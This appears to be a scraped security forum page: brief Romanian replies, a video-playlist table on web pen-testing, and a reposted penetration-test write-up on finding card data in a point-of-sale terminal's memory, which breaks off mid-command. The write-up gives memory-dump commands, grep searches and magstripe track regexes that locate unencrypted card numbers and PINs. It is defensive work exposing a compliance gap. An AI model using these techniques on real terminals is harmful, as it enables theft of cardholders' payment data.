-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Bypass Antivirus Dynamic Analysis
Nytro replied to Usr6's topic in Reverse engineering & exploit development
Super. Banale dar eficiente. -
Nu pare open-source. De ce TrueCrypt care e open-source ar avea backdoor si noi ar trebui sa avem mai multa incredere intr-un program "Enterprise" non-open-source?
-
Ce backdoor? Nu de alta, dar m-am uitat prin codul lui tocmai din aceasta privinta si nu am gasit nimic interesant.
-
daca se sinucide o fata din cauza mea ce patesc? [fara caterinca]
Nytro replied to EterNo's topic in Discutii non-IT
Poti sa o dai in judecata daca te ameninta cu asa ceva. Vorbesc serios. E tot o forma de santaj. -
Video Tutorial: Introduction to Web Application Pen-Testing
Nytro replied to Nytro's topic in Tutoriale video
[h=1]Web Application Pen-Testing[/h] [TABLE=class: pl-video-table] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 49:51 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 27:17 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 7:37 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 1:05:13 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 30:41 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 30:02 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 25:31 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 32:45 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 14:49 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 22:08 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 47:14 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 57:39 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 58:42 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 1:10:58 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 57:03 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 30:48 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 19:44 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:52 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 33:43 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 47:42 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 32:44 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 8:22 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 39:21 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 20:56 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 54:31 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:58 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:58 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:19 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:16 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:43 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 3:55 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:08 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:29 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 3:50 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:56 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:56 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:37 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:52 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:32 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:01 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:54 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:08 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:55 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:46 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:13 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:47 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:07 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:55 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:35 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:42 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:48 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:42 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:50 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:44 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:51 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:00 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:59 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 5:00 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:56 [/TD] [/TR] [TR=class: pl-video yt-uix-tile] [TD=class: pl-video-handle][/TD] [TD=class: pl-video-index][/TD] [TD=class: pl-video-thumbnail] [/TD] [TD=class: pl-video-title] [/TD] [TD=class: pl-video-badges][/TD] [TD=class: pl-video-owner]webpwnized[/TD] [TD=class: pl-video-added-by][/TD] [TD=class: pl-video-time] 4:59 [/TD] [/TR] [/TABLE] PLAYLIST: -
Trolling Memory for Credit Cards in POS / PCI Environments In a recent penetration test, I was able to parlay a network oversight into access to a point of sale terminal. Given the discussions these days, the next step for me was an obvious one - memory analysis. My first step was to drive to the store I had compromised and purchase an item. I'm not a memory analysis guru, but the memory capture and analysis was surprisingly easy. First, dump memory: dumpit Yup, it's that simple, I had the dumpit executable locally by that point (more info here https://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216) or, if you don't have keyboard access (dumpit requires a physical "enter" key, I/O redirection won't work for this): win32dd /f memdump.img (from the SANS Forensics Cheat Sheet at https://blogs.sans.org/computer-forensics/files/2012/04/Memory-Forensics-Cheat-Sheet-v1_2.pdf ) Next, I'll dig for my credit card number specifically: strings memdump.img | grep [mycardnumbergoeshere] | wc -l 171 Yup, that's 171 occurences in memory, unencrypted. So far, we're still PCI complaint - PCI 2.0 doesn't mention cardholder data in memory, and 3.0 only mentions it in passing. The PCI standard mainly cares about data at rest - which to most auditors means "on disk or in database", or data in transit - which means on the wire, capturable by tcpdump or wireshark. Anything in memory, no matter how much of a target in today's malware landscape, is not an impact on PCI compliance. The search above was done in windows, using strings from SysInternals - by default this detects strings in both ASCII and Unicode. If I repeat this in linux (which by default is ASCII only), the results change: strings memdump.img | grep [mycardnumbergoeshere] | wc -l 32 To get the rest of the occurences, I also need to search for the Unicode representations, which "strings" calls out as "little-endian" numbers: strings -el memdump.img | grep [mycardnumbergoeshere] | wc -l 139 Which gives me the same total of 171. Back over to windows, let's dig a little deeper - how about my CC number and my name tied together? strings memdump.img | grep [myccnumbergoeshere] | grep -i vandenbrink | wc -l 1 or my CC number plus my PIN (we're CHIP+PIN in Canada) strings memdump.img | grep [mycardnumbergoeshere] | grep [myPINnumber] 12 Why exactly the POS needs my PIN is beyond me! Next, let's search this image for a number of *other* credit cards - rather than dig by number, I'll search for issuer name so there's no mistake. These searches are all using the Sysinternals "strings" since the defaults for that command lend itself better to our search: CAPITAL ONE 85 VISA 565 MASTERCARD 1335 AMERICAN EXPRESS 20 and for kicks, I also searched for debit card prefixes (I only search for a couple with longer IIN numbers): Bank of Montreal 500766 245 TD CAnada Trust 589297 165 Looking for my number + my CC issuer in the same line gives me: strings memdump.img | grep [myccnumbergoeshere] | grep [MASTERCARD] | wc -l gives me a result of "5" So, assuming that this holds true for others (it might not, even though the patterns are all divisible by 5), this POS terminal has hundreds, but more likely thousands of valid numbers in memory, along with names, PIN numbers and other informaiton Finally, looking for a full magstripe in memory: The search for a full stripe: grep -aoE "(((%?[bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))" memdump.img | wc -l 0 where: -a = Processes a binary file as text -o = Shows only the matched text -E = Treats the pattern as an extended regular expression or using this regex to find Track strings only: ((%?[bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?) gives us 0 results. or this regex to find Track 2 strings only: ([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?) Gives us 162 (I'm not sure how much I trust this number) Anyway, what this tells me is that this store isn't seeing very many folks swipe their cards, it's all CHIP+PIN (which you'd expect) (Thanks to the folks at bromium for the original regular expressions and breakdown: Understanding malware targeting Point Of Sale Systems | Bromium Labs) Getting system uptime (from the system itself) wraps up this simple analysis - the point of this being "how long does it take to collect this much info?" net statistics server | find "since"" shows us that we had been up for just under 4 days. Other ways to find uptime? from the CLI: systeminfo " find "Boot Time" or, in powershell: PS C:\> Get-WmiObject win32_operatingsystem | 